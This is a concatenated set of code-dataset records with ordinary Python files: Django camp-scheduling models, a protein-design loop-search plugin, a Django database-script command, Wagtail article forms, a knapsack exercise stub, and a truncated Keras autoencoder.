models.SlugField(\n\t\t\tdefault = '',\n\t\t\tmax_length = 16,\n\t\t\tverbose_name = u'Tag'\n\t)\t\n\tdef __unicode__(self):\n\t\treturn self.tag\n\n######################################################\n#\n#\tAttachments\n#\n#####################################################\nclass Attachment (models.Model):\n\t# generic foreign key to base model\n\t# so we can link attachment to any model defined below\n\tcontent_type = models.ForeignKey(ContentType)\n\tobject_id = models.PositiveIntegerField()\n\tcontent_object = GenericForeignKey('content_type', 'object_id')\n\n\t# instance fields\n\tcreated_by = models.ForeignKey (\n\t\t\tUser,\n\t\t\tblank = True,\n\t\t\tnull = True,\n\t\t\tdefault = None,\n\t\t\tverbose_name = u'创建用户',\n\t\t\thelp_text = ''\n\t\t)\n\t\t\n\t# basic value fields\n\tname = models.CharField(\n\t\t\tdefault = 'default name',\n\t\t\tmax_length = 64,\n\t\t\tverbose_name = u'附件名称'\n\t\t)\n\tdescription = models.CharField (\n\t\t\tmax_length = 64,\n\t\t\tdefault = 'default description',\n\t\t\tverbose_name = u'附件描述'\n\t\t)\n\n\tfile = models.FileField (\n\t\t\tupload_to = '%Y/%m/%d',\n\t\t\tverbose_name = u'附件',\n\t\t\thelp_text = u'附件'\n\t\t)\t\n\n\tdef __unicode__(self):\n\t\treturn self.file.name\n\nclass AttachmentForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Attachment\n\t\tfields = ['description','file']\n\n######################################################\n#\n#\tApp specific models\n#\n#####################################################\nclass MyZip(models.Model):\n\tzipcode = models.CharField(\n\t\tmax_length = 16,\n\t\tdefault = '',\n\t\tverbose_name = u'Zip'\n\t)\n\tcity = models.CharField(\n\t\tmax_length = 32,\n\t\tverbose_name = u'City'\n\t)\n\tstate = models.CharField(\n\t\tmax_length = 8,\n\t\tverbose_name = u'State abbr'\n\t)\n\nclass 
MyNotification(models.Model):\n\tcreated = models.DateTimeField(\n\t\tauto_now_add = True\n\t)\n\towner = models.ForeignKey (\n\t\tUser,\n\t\tdefault = None,\n\t\tverbose_name = u'Author',\n\t\thelp_text = ''\n\t)\n\ttitle = models.CharField(\n\t\tmax_length = 128,\n\t\tdefault = u'Announcement!',\n\t\tverbose_name = u'Notification title'\n\t)\n\tdescription = models.TextField(\n\t\tverbose_name = u'Notification message'\n\t)\n\nclass MyOrganizer(MyBaseModel):\n\tstate = models.ForeignKey(\n\t\t'MyZip',\n\t\tverbose_name = u'State, City, Zip code'\n\t)\n\taddress = models.CharField(\n\t\tmax_length = 128,\n\t\tnull = True,\n\t\tblank = True,\n\t\tverbose_name = u'Camp organizer location'\n\t)\n\temail = models.EmailField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Camp contact email'\n\t)\n\tphone = models.CharField(\n\t\tmax_length = 16,\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name =u'Camp contact phone'\n\t)\n\turl = models.URLField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Org home page'\n\t)\n\nclass MyCamp(MyBaseModel):\n\torganizers = models.ManyToManyField(\n\t\t'MyOrganizer',\n\t\tverbose_name = u'Camp organizer,'\n\t)\n\tregistration_start = models.DateField(\n\t\tverbose_name = u\"Registration starting date\"\n\t)\n\tregistration_end = models.DateField(\n\t\tverbose_name = u\"Registration deadline date\"\n\t)\n\t_start = models.DateField(\n\t\tverbose_name = u\"Camp starting date, calcuated\"\n\t)\n\t_end = models.DateField(\n\t\tverbose_name = u\"Camp's last day, calcuated\"\n\t)\n\temail = models.EmailField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Camp contact email'\n\t)\n\tphone = models.CharField(\n\t\tmax_length = 16,\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name =u'Camp contact phone'\n\t)\n\tperson = models.CharField(\n\t\tmax_length = 64,\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Camp contact person'\n\t)\n\tex_url = models.URLField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'External camp home page'\n\t)\n\nclass MyCampProgram(MyBaseModel):\n\tcamp = models.ForeignKey(\n\t\t'MyCamp',\n\t\tverbose_name = u'Camp'\n\t)\n\n\t# we allow programs to be in locations different from camp itself\n\t# think about a camp having multiple locations, eg. 
on campus, \n\t# program A could be in building 123, where program B in building 456\n\tstate = models.ForeignKey(\n\t\t'MyZip',\n\t\tnull = True,\n\t\tblank = True,\n\t\tverbose_name = u'State, City, Zip code'\n\t)\n\taddress = models.CharField(\n\t\tmax_length = 128,\n\t\tnull = True,\n\t\tblank = True,\n\t\tverbose_name = u'Program location'\n\t)\n\n\t# enrollment age restrictions\n\tmin_age = models.IntegerField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Minimum age'\n\t)\n\tmax_age = models.IntegerField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Maximum age'\n\t)\n\tis_special_needs_ready = models.BooleanField(\n\t\tdefault = False,\n\t\tverbose_name = u'Is program available to people with special needs?'\n\t)\n\n\tstart = models.DateField(\n\t\tverbose_name = u\"Program starting date\"\n\t)\n\tend = models.DateField(\n\t\tverbose_name = u\"Program's last day\"\n\t)\n\tex_url = models.URLField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'External camp program home page'\n\t)\n\tnotes = models.TextField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Program specific notes'\n\t)\n\nclass MyProgramSchedule(MyBaseModel):\n\tprogram = models.ForeignKey(\n\t\t'MyCampProgram',\n\t\tverbose_name = u'Camp program'\t\n\t)\n\tstarting_time = models.CharField(\n\t\tmax_length = 8,\n\t\tverbose_name = u'Program starting time'\n\t)\n\tending_time = models.CharField(\n\t\tmax_length = 8,\n\t\tverbose_name = u'Program ending time'\n\t)\n\tday = models.DateField(\n\t\tverbose_name = u'Day'\n\t)\n\tnotifications = models.ManyToManyField(\n\t\t'MyNotification',\n\t\tverbose_name = u'Program notifications'\n\t)","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
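The `Attachment` model in the record above is wired to any other model through its `content_type`/`object_id` pair, and every `MyBaseModel` subclass exposes the reverse side via the `attachments` `GenericRelation`. A usage sketch, assuming a saved `MyCamp` instance `camp` and an uploaded file object `f` (both hypothetical):

```python
from django.contrib.contenttypes.models import ContentType

# Attach a file to an arbitrary model instance via the generic foreign key.
att = Attachment.objects.create(
    content_type=ContentType.objects.get_for_model(camp),
    object_id=camp.pk,
    name='flyer',
    description='camp flyer',
    file=f,
)

# The GenericRelation declared on MyBaseModel makes the reverse query work:
camp.attachments.all()  # -> queryset containing `att`
```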
+{"seq_id":"551969466","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. codeauthor:: Jaume Bonet \n\n.. affiliation::\n Laboratory of Protein Design and Immunoengineering \n Bruno Correia \n\"\"\"\n# Standard Libraries\nimport os\nimport sys\nfrom pathlib import Path\nfrom typing import List, Tuple, Dict\nimport math\nfrom tempfile import NamedTemporaryFile\nimport shlex\nfrom ast import literal_eval\nfrom subprocess import run\nimport gzip\nimport itertools\n\n\n# External Libraries\nimport pandas as pd\nfrom pandas.compat import StringIO\nfrom SBI.structure import PDB, PDBFrame, ChainFrame\nimport SBI.structure.geometry as SBIgeo\nfrom rstoolbox.io import parse_rosetta_fragments, write_rosetta_fragments\n\n# This Library\nfrom topobuilder.case import Case\nimport topobuilder.core as TBcore\nimport topobuilder.utils as TButil\nfrom topobuilder import plugin_source\nfrom .core import core\n\n\n__all__ = ['apply']\n\n\ndef apply( cases: List[Case],\n prtid: int,\n loop_range: int = 3,\n top_loops: int = 20,\n harpins_2: bool = True,\n rmsd_cut: float = 5.0,\n **kwargs ) -> List[Case]:\n \"\"\"Use MASTER to cover the transitions between secondary structures.\n\n And something else.\n \"\"\"\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('--- TB PLUGIN: LOOP_MASTER ---\\n')\n\n # Get list of PDS structures\n tempdb = False\n database = core.get_option('master', 'pds')\n database = Path(database)\n if database.is_file():\n pass\n elif database.is_dir():\n f = NamedTemporaryFile(mode='w', delete=False)\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Temporary file for PDS database: {}\\n'.format(f.name))\n [f.write(str(x.resolve()) + '\\n') for x in database.glob('*/*.pds')]\n f.close()\n database = Path(f.name)\n tempdb = True\n else:\n raise ValueError('The provided MASTER database directory/list file cannot be found.')\n\n # Get ABEGOS\n abegodata = get_abegos()\n\n # Get FragFiles\n fragfiles = get_fragfiles()\n\n # Execute for each case\n for i, case in enumerate(cases):\n cases[i].data.setdefault('metadata', {}).setdefault('loop_fragments', [])\n cases[i].data.setdefault('metadata', {}).setdefault('loop_lengths', [])\n cases[i] = case_apply(case, database, loop_range, top_loops, rmsd_cut, abegodata, harpins_2, fragfiles)\n cases[i] = cases[i].set_protocol_done(prtid)\n\n if tempdb:\n os.unlink(f.name)\n\n return cases\n\n\ndef case_apply( case: Case,\n pds_list: Path,\n loop_range: int,\n top_loops: int,\n rmsd_cut: float,\n abego: pd.DataFrame,\n harpins_2: bool,\n fragfiles: pd.DataFrame ) -> str:\n \"\"\"\n \"\"\"\n # Loop MASTER is only applied to a Case with one single connectivity and already reoriented\n if case.connectivity_count > 1:\n raise ValueError('Loop MASTER can only be applied to one connectivity.')\n\n # We will need the coordinates of the secondary structures to execute this one\n # This will already cast it to absolute\n with TBcore.on_option_value('system', 'overwrite', False):\n case = plugin_source.load_plugin('builder').case_apply(case, connectivity=True)\n\n # Generate the folder tree for a single connectivity.\n folders = case.connectivities_paths[0].joinpath('loop_master')\n folders.mkdir(parents=True, exist_ok=True)\n\n # Find steps: Each pair of secondary structure.\n it = case.connectivities_str[0].split('.')\n steps = [it[i:i + 2] for i in range(0, len(it) - 1)]\n loop_step = case.cast_absolute()['configuration.defaults.distance.loop_step']\n lengths = case.connectivity_len[0]\n start = 1\n\n for i, sse in enumerate(steps):\n # 1. 
Make folders and files\n wfolder = folders.joinpath('loop{:02d}'.format(i + 1))\n wfolder.mkdir(parents=True, exist_ok=True)\n outfile = wfolder.joinpath('loop_master.jump{:02d}.pdb'.format(i + 1))\n masfile = outfile.with_suffix('.master')\n checkpoint = wfolder.joinpath('checkpoint.json')\n\n # 2. Check if checkpoint exists, retrieve and skip\n reload = TButil.checkpoint_in(checkpoint)\n if reload is not None:\n case.data['metadata']['loop_fragments'].append(reload)\n case.data['metadata']['loop_lengths'].append(int(reload['edges']['loop']))\n start += (int(reload['edges']['sse1']) + int(reload['edges']['loop']))\n continue\n\n # 2. Check hairpin\n sse1 = case.get_sse_by_id(sse[0])\n sse1_name = sse1['id']\n sse2 = case.get_sse_by_id(sse[1])\n sse2_name = sse2['id']\n is_hairpin = check_hairpin(sse1_name, sse2_name)\n\n if not masfile.is_file():\n # 3. Generate structures\n sse1, sse2 = make_structure(sse1, sse2, outfile)\n\n # 4. calculate expected loop length by loop_step\n Mdis, mdis = get_loop_length(sse1, sse2, loop_step, loop_range)\n\n # 5. Run master\n execute_master_fixedgap(outfile, pds_list, mdis, Mdis, rmsd_cut)\n\n # 6. Minimize master data (pick top_loopsx3 lines to read and minimize the files)\n match_count = minimize_master_file(masfile, top_loops, 3)\n\n # 7. Retrieve master data\n dfloop = process_master_data(masfile, sse1_name, sse2_name, abego, fragfiles, top_loops, is_hairpin and harpins_2)\n sse1l, loopl, sse2l = lengths[i], int(dfloop['loop_length'].values[0]), lengths[i + 1]\n total_len = sse1l + loopl + sse2l\n end_edge = total_len + start - 1\n edges = {'ini': int(start), 'end': int(end_edge), 'sse1': int(sse1l), 'loop': int(loopl), 'sse2': int(sse2l)}\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('\\nINI: {}; END: {}; SSE1: {}; LOOP: {}; SSE2: {}\\n\\n'.format(start, end_edge, sse1l, loopl, sse2l))\n sys.stdout.write(dfloop.to_string() + '\\n')\n\n # 8. 
Make Fragments\n loop_data = make_fragment_files(dfloop, edges, masfile)\n loop_data['match_count'] += match_count\n case.data['metadata']['loop_fragments'].append(loop_data)\n case.data['metadata']['loop_lengths'].append(int(loopl))\n\n start += (sse1l + loopl)\n\n # Checkpoint save\n TButil.checkpoint_out(checkpoint, loop_data)\n\n return case\n\n\ndef make_fragment_files( dfloop: pd.DataFrame, edges: Dict, masfile: Path ) -> Dict:\n \"\"\"\n \"\"\"\n data = {'loop_length': int(dfloop.iloc[0]['loop_length']), 'abego': list(dfloop['loop'].values),\n 'edges': edges, 'fragfiles': [], 'match_count': 0}\n\n dfs3 = []\n dfs9 = []\n sample = math.ceil(200 / dfloop.shape[0])\n for i, row in dfloop.iterrows():\n # Remember: MASTER match starts with 0!\n dfs3.append((parse_rosetta_fragments(str(row['3mers']), source='{}_{}'.format(row['pdb'], row['chain']))\n .slice_region(row['match'][0][0] + 1, row['match'][1][1] + 1).sample_top_neighbors(sample)\n .renumber(edges['ini']).top_limit(edges['end'])))\n dfs9.append((parse_rosetta_fragments(str(row['9mers']), source='{}_{}'.format(row['pdb'], row['chain']))\n .slice_region(row['match'][0][0] + 1, row['match'][1][1] + 1).sample_top_neighbors(sample)\n .renumber(edges['ini']).top_limit(edges['end'])))\n\n # Merge Fragments\n dfs3all = dfs3[0]\n dfs9all = dfs9[0]\n for i in range(1, len(dfs3)):\n dfs3all = dfs3all.add_fragments(dfs3[i], ini=edges['ini'], how='append')\n dfs9all = dfs9all.add_fragments(dfs9[i], ini=edges['ini'], how='append')\n dfs3all = dfs3all.sample_top_neighbors(200)\n dfs9all = dfs9all.sample_top_neighbors(200)\n\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Writing 3mers fragfile\\n')\n data['fragfiles'].append(write_rosetta_fragments(dfs3all, prefix=str(masfile.with_suffix('')), strict=True))\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('3mers fragfile: {}\\n'.format(data['fragfiles'][-1]))\n sys.stdout.write('Writing 9mers fragfile\\n')\n data['fragfiles'].append(write_rosetta_fragments(dfs9all, prefix=str(masfile.with_suffix('')), strict=True))\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('9mers fragfile: {}\\n'.format(data['fragfiles'][-1]))\n\n dfs3all.drop(columns=['pdb', 'frame', 'neighbors', 'neighbor',\n 'aa', 'sse', 'phi', 'psi', 'omega']).to_csv(data['fragfiles'][0] + '.csv', index=False)\n dfs9all.drop(columns=['pdb', 'frame', 'neighbors', 'neighbor',\n 'aa', 'sse', 'phi', 'psi', 'omega']).to_csv(data['fragfiles'][1] + '.csv', index=False)\n imageprefix = masfile.with_suffix('.fragprofile')\n TButil.plot_fragment_templates(dfs3all, dfs9all, imageprefix)\n\n return data\n\n\ndef get_fragfiles():\n \"\"\"\n \"\"\"\n fragpath = Path(core.get_option('master', 'fragments'))\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Listing available fragment files at: {}\\n'.format(fragpath.name))\n if not fragpath.is_dir():\n raise IOError('MASTER fragments folder cannot be found.')\n return pd.DataFrame([(x.name[:4], x.name[5:6], x, y) for x, y in zip(sorted(fragpath.glob('*/*3mers.gz')),\n sorted(fragpath.glob('*/*9mers.gz')))],\n columns=['pdb', 'chain', '3mers', '9mers'])\n\n\ndef get_abegos():\n \"\"\"\n \"\"\"\n abegos = core.get_option('loop_master', 'abego')\n abegos = Path(abegos)\n if not abegos.is_file():\n raise IOError('The ABEGO fasta file has to be provided')\n\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Loading ABEGO data from: {}\\n'.format(abegos.name))\n doopen = gzip.open if abegos.suffix == '.gz' else open\n abegodata = []\n with 
doopen(abegos, 'rt') as fd:\n for line1, line2 in itertools.zip_longest(*[fd] * 2):\n line2 = line2 if len(line2.strip()) != 0 else 'NON\\n'\n line1 = line1.strip().lstrip('>').split('_')\n abegodata.append('{},{},{}'.format(line1[0], line1[1], line2))\n abegodata = pd.read_csv(StringIO(''.join(abegodata)), names=['pdb', 'chain', 'abego'], header=None)\n abegodata = abegodata[abegodata['abego'] != 'NON']\n\n return abegodata\n\n\ndef make_structure(sse1: dict, sse2: dict, outfile: Path) -> Tuple[PDBFrame, PDBFrame]:\n \"\"\"\n \"\"\"\n sse1 = PDB(pd.DataFrame(sse1['metadata']['atoms'],\n columns=['auth_comp_id', 'auth_atom_id', 'auth_seq_id',\n 'Cartn_x', 'Cartn_y', 'Cartn_z'])).renumber(1)\n\n sse2 = PDB(pd.DataFrame(sse2['metadata']['atoms'],\n columns=['auth_comp_id', 'auth_atom_id', 'auth_seq_id',\n 'Cartn_x', 'Cartn_y', 'Cartn_z'])).renumber(sse1.iloc[-1]['auth_seq_id'] + 5)\n structure = pd.concat([sse1, sse2])\n structure['id'] = list(range(1, structure.shape[0] + 1))\n\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('-> generating structure {}\\n'.format(outfile.resolve()))\n structure.write(output_file=str(outfile), format='pdb', clean=True,\n force=TBcore.get_option('system', 'overwrite'))\n\n return sse1, sse2\n\n\ndef get_loop_length(sse1: PDB, sse2: PDB, loop_step: int, loop_range: int) -> Tuple[int, int]:\n \"\"\"\n \"\"\"\n res1 = ChainFrame(PDB(sse1)).last_compound\n res2 = ChainFrame(PDB(sse2)).first_compound\n distance = SBIgeo.point_distance(res1[res1['label_atom_id'] == 'N'].coordinates,\n res2[res2['label_atom_id'] == 'N'].coordinates)\n distance = math.ceil(distance / loop_step)\n distance = [x for x in range(distance - loop_range - 1, distance + loop_range + 1) if x > 0]\n return max(distance), min(distance)\n\n\ndef execute_master_fixedgap(outfile: Path, pds_list: Path, mdis: int, Mdis: int, rmsd_cut: float):\n \"\"\"\n \"\"\"\n createPDS = core.get_option('master', 'create')\n createbash = '{0} --type query --pdb {1} --pds {2}'\n master = core.get_option('master', 'master')\n masterbash = '{0} --query {1} --targetList {2} --rmsdCut {6} --matchOut {3} --gapLen {4}-{5}'\n\n createcmd = shlex.split(createbash.format(createPDS, outfile, outfile.with_suffix('.pds')))\n mastercmd = shlex.split(masterbash.format(master, outfile.with_suffix('.pds'),\n pds_list, outfile.with_suffix('.master'), mdis, Mdis, rmsd_cut))\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('-> Execute: {}\\n'.format(' '.join(createcmd)))\n with open(os.devnull, 'w') as devnull:\n run(createcmd, stdout=devnull)\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('-> Execute: {}\\n'.format(' '.join(mastercmd)))\n with open(os.devnull, 'w') as devnull:\n run(mastercmd, stdout=devnull)\n\n\ndef minimize_master_file( masfile: Path, top_loops: int, multiplier: int ) -> int:\n \"\"\"\n \"\"\"\n try:\n with open(masfile) as fd:\n num_lines = sum(1 for line in fd if line.rstrip())\n with open(masfile) as fd:\n head = [next(fd) for x in range(top_loops * multiplier)]\n with open(masfile, 'w') as fd:\n fd.write(''.join(head))\n except StopIteration:\n pass\n return num_lines\n\n\ndef check_hairpin( name1: str, name2: str) -> bool:\n \"\"\"\n \"\"\"\n if name1[0] != name2[0]:\n return False\n if name1[-1] != 'E':\n return False\n if int(name1[1]) == int(name2[1]) + 1:\n return True\n if int(name1[1]) == int(name2[1]) - 1:\n return True\n return False\n\n\ndef process_master_data( masfile: Path,\n name1: str,\n name2: str,\n abego: pd.DataFrame,\n fragfiles: 
pd.DataFrame,\n top_loops: int,\n hairpin: bool ) -> pd.DataFrame:\n \"\"\"\n \"\"\"\n def cutter(row):\n match = row['match']\n # MASTER starts match count at 0!\n loop = row['abego'][match[0][1] + 1: match[1][0]]\n return row['abego'][match[0][0]: match[1][1] + 1], loop, len(loop)\n\n if masfile.with_suffix('.csv').is_file():\n df = pd.read_csv(masfile.with_suffix('.csv'))\n df['match'] = df['match'].apply(literal_eval)\n return df\n\n dfloop = TButil.parse_master_file(masfile)\n dfloop = dfloop.merge(abego, on=['pdb', 'chain']).merge(fragfiles, on=['pdb', 'chain']).dropna()\n dfloop[['abego', 'loop', 'loop_length']] = dfloop.apply(cutter, axis=1, result_type='expand')\n dfloop = dfloop.iloc[:top_loops]\n dfloop['length_count'] = dfloop.loop_length.map(dfloop.loop_length.value_counts())\n dfloop.drop(columns=['pds_path']).to_csv(masfile.with_suffix('.all.csv'), index=False)\n finaldf = dfloop.sort_values('rmsd').drop_duplicates(['loop'])\n\n pick = 0\n if hairpin and 2 in finaldf['loop_length'].values:\n pick = 2\n else:\n pick = finaldf[finaldf['length_count'] == finaldf['length_count'].max()]['loop_length'].min()\n finaldf = finaldf[finaldf['loop_length'] == pick]\n\n TButil.plot_loop_length_distribution(dfloop, pick, masfile.with_suffix(''), 'loop {} <-> {}'.format(name1, name2))\n\n df = finaldf.drop(columns=['pds_path'])\n df.to_csv(masfile.with_suffix('.csv'), index=False)\n return df\n","sub_path":"topobuilder/base_plugins/loop_master/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
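A small illustration of `check_hairpin` from the plugin above. It assumes secondary-structure ids of the form `<layer letter><position digit><type letter>`, e.g. `'A1E'` for a strand; that id format is inferred from the checks, not stated in this file:

```python
assert check_hairpin('A1E', 'A2E') is True   # consecutive strands, same layer
assert check_hairpin('A1E', 'A3E') is False  # strands, but not consecutive
assert check_hairpin('A1H', 'A2E') is False  # first element is not a strand
assert check_hairpin('A1E', 'B2E') is False  # different layers never pair
```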
+{"seq_id":"322371177","text":"\"\"\"\nRun the specified database script\n\"\"\"\nimport util\nfrom util.decorators import requires\n\n\n@requires(\"django\")\ndef run(self, *args, **kwargs):\n \"\"\"\n Run the specified database script\n \"\"\"\n\n action = args[0] if args else None\n if not action:\n self.console.yellow(\"No command specified.\")\n return\n\n # if action == \"migrate\":\n # uri = util.io.relative(self.django.config.snapshot, \"migrate.sql\")\n # if util.io.exists(uri):\n # sql = util.io.read_file(uri, text=True).strip()\n # lines = sql.split(\"\\n\")\n # lines = [l for l in lines if l and not l.strip().startswith(\"-\") and len(l.strip()) > 3]\n # if lines:\n # # print(\"run the sql script...\")\n # self.console.yellow(\"*** RUN THE MIGRATE SQL FILE\")\n # settings = self.django.settings\n # database = settings[\"DATABASES\"]\n # database = database[\"default\"] if \"default\" in database else database\n # dbhost = database[\"HOST\"]\n # dbname = database[\"NAME\"]\n # dbuser = database[\"USER\"]\n # pwd = database[\"PASSWORD\"]\n # port = database[\"PORT\"]\n # cmd = \"export PGPASSWORD={pwd} && psql -h {host} -d {db} -U {user} -p {port} -a -w -f {sql}\".format(\n # pwd=pwd,\n # host=dbhost,\n # db=dbname,\n # user=dbuser,\n # port=port,\n # sql=uri\n # )\n # self.shell(cmd)\n #\n # cmd = \"{python} manage.py migrate\".format(python=self.interpreter.python)\n # # print(cmd)\n # self.shell(cmd)\n # return\n\n\n self.django.run_db_script(action, prompt=False)\n\n # uri = util.io.relative(self.django.config.snapshot, \"{name}.py\".format(name=action))\n # if util.io.exists(uri):\n # self.console.green(\"apply the db script - \" + action)\n # self.django.run_db_script(action, prompt=False)\n # return\n\n # def run_db_script(self, name, prompt=True):\n # uri = util.io.relative(self.config.snapshot, \"{name}.py\".format(name=name))\n # if util.io.exists(uri):\n # self.console.red(\"run db - \" + action)","sub_path":"commands/django/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"444858901","text":"from django.utils import timezone\nfrom django import forms\n\nfrom wagtail.admin.forms import WagtailAdminPageForm\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ReactionQuestionChoiceForm(forms.Form):\n choice = forms.ChoiceField(\n required=True,\n error_messages={'required': _(\"You didn't select a choice\")})\n\n def __init__(self, *args, **kwargs):\n from molo.core.models import ReactionQuestionChoice\n super(ReactionQuestionChoiceForm, self).__init__(*args, **kwargs)\n self.fields['choice'].choices = [(\n c.pk, c.title) for c in ReactionQuestionChoice.objects.all()]\n\n\nclass ArticlePageForm(WagtailAdminPageForm):\n\n def clean(self):\n cleaned_data = super(ArticlePageForm, self).clean()\n\n hero_article = cleaned_data.get(\"feature_as_hero_article\")\n promote_date = cleaned_data.get(\"promote_date\")\n demote_date = cleaned_data.get(\"demote_date\")\n\n if hero_article:\n if not promote_date:\n self.add_error(\n \"promote_date\",\n \"Please specify the date and time that you would like \"\n \"this article to appear as the Hero Article.\"\n )\n\n if not demote_date:\n self.add_error(\n \"demote_date\",\n \"Please specify the date and time that you would like \"\n \"this article to be demoted as the Hero Article.\"\n )\n\n if promote_date and demote_date:\n if promote_date < timezone.now():\n self.add_error(\n \"promote_date\",\n \"Please select the present date, or a future date.\"\n )\n\n if demote_date < timezone.now() or demote_date < promote_date:\n self.add_error(\n \"demote_date\",\n \"The article cannot be demoted before it has been \"\n \"promoted.\"\n )\n\n return cleaned_data\n\n\nclass MediaForm(forms.Form):\n '''Form to upload a sinlge zip file.'''\n zip_file = forms.FileField(label=\"Zipped Media File\")\n\n def clean_zip_file(self):\n file = self.cleaned_data['zip_file']\n\n if file:\n extension = file.name.split('.')[-1]\n if extension != 'zip':\n raise forms.ValidationError('File Type Is Not .zip')\n return file\n","sub_path":"molo/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"513599296","text":"#!/usr/bin/env python3\n\n# ================= 代码实现开始 =================\n\n''' 请在这里定义你需要的全局变量 '''\n\n# n个物品,每个物品有体积价值,求若扔掉一个物品后装进给定容量的背包的最大价值\n# n:如题\n# w:长度为n+1的数组,w[i]表示第i个物品的��值(下标从1开始,下标0是一个数字-1,下面同理)\n# v:长度为n+1的数组,v[i]表示第i个物品的体积\n# q:如题\n# qV:长度为q+1的数组,qV[i]表示第i次询问所给出的背包体积\n# qx:长度为q+1的数组,qx[i]表示第i次询问所给出的物品编号\n# 返回值:返回一个长度为q的数组,依次代表相应询问的答案\ndef getAnswer(n, w, v, q, qV, qx):\n ''' 请在这里设计你的算法 '''\n\n# ================= 代码实现结束 =================\n\nv, w, qv, qx = [], [], [], []\nv.append(-1)\nw.append(-1)\nqv.append(-1)\nqx.append(-1)\nn = int(input())\nfor i in range(n):\n a, b = map(int, input().split())\n v.append(a)\n w.append(b)\nq = int(input())\nfor i in range(q):\n a, b = map(int, input().split())\n qv.append(a)\n qx.append(b)\nans = getAnswer(n, w, v, q, qv, qx)\nfor i in ans:\n print(i)\n\n","sub_path":"week3/bag_hard/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"604702826","text":"## autoencoder\r\n\r\n\r\nimport numpy as np\r\n\r\nfrom keras.layers import Input, Dense\r\nfrom keras.models import Model\r\nfrom keras import optimizers\r\nimport data_gather\r\nimport data_gather4\r\nimport matplotlib.pyplot as plt\r\nimport xlwt\r\n#mnist2=data_gather2.ggg()\r\n#mnist1=data_gather.ggg()\r\n\r\n\r\n# Create the model\r\ndef create_model(ndim):\r\n\t# this is our input placeholder\r\n\tinput_img = Input(shape = (ndim, ))\r\n\t\r\n\t# \"encoded\" is the encoded representation of the input\r\n\tencoded1 = Dense(23, activation = 'selu')(input_img)\r\n\tencoded2=Dense(20, activation = 'selu')(encoded1)\r\n\t#encoded3=Dense(200, activation = 'relu')(encoded2)\r\n\t#encoded4=Dense(300, activation = 'relu')(encoded3)\r\n\t#encoded5=Dense(400, activation = 'relu')(encoded4)\r\n\t#encoded6=Dense(500, activation = 'relu')(encoded5)\r\n\t#encoded1 = Dense(6, activation='tanh')(encoded)\r\n\t#encoded2 = Dense(6, activation='tanh')(encoded1)\r\n\t#encoded3 = Dense(encoding_dim, activation='tanh')(encoded2)\r\n #encoded = Dense(64, activation='relu')(encoded)\r\n #encoded = Dense(32, activation='relu')(encoded)\r\n\r\n #decoded = Dense(128, activation='relu')(decoded)\r\n #decoded = Dense(784, activation='sigmoid')(decoded)\r\n\t# \"decoded\" is the lossy reconstruction of the input\r\n\tdecoded1=Dense(15, activation = 'selu')(encoded2)\r\n\tdecoded=Dense(10, activation = 'selu')(decoded1)\r\n\t#decoded3=Dense(300, activation = 'selu')(decoded2)\r\n\t#decoded4=Dense(200, activation = 'selu')(decoded3)\r\n\t#decoded5=Dense(100, activation = 'selu')(decoded4)\r\n\t#decoded6=Dense(50, activation = 'selu')(decoded5)\r\n\t#decoded=Dense(ndim, activation = 'selu')(decoded6)\r\n\t#decoded=Dense(4, activation = 'selu')(decoded1)\r\n\t#decoded = Dense(ndim, activation = 'relu')(decoded1)\r\n\t\r\n\t# this model maps an input to its reconstruction\r\n\tautoencoder = Model(input_img, decoded)\r\n\t\r\n\t# encoder\r\n\tencoder1 = Model(input_img, encoded2)\r\n\tencoder= Model(input_img, [encoded1,encoded2])\r\n #encoder1 = Model(input_img, encoded6)\r\n \r\n\t\r\n\t# compile the autoencoder\r\n\toptimizer=optimizers.Adam(lr=0.0005, epsilon=1e-08, decay=0)\r\n\tautoencoder.compile(loss = 'mean_squared_error', optimizer = optimizer)\r\n\t\r\n\treturn (autoencoder, encoder,encoder1)\r\n\r\n\r\n# Train the model, iterating on the data in batches of batch_size samples\r\ndef train_model(autoencoder, x_train, batch_size, epochs):\r\n\tautoencoder.fit(x_train, x_train, batch_size = batch_size, epochs = epochs, shuffle = True)\r\n\t\r\n\treturn autoencoder\r\n\r\n\r\ndef main():\r\n\t# parameters\r\n\tnsamples = 2325\r\n\tndim = 10\r\n\t#encoding_dim = 200\r\n\tbatch_size = 2325\r\n\tepochs = 8000\r\n\t\r\n\t# generate dummy 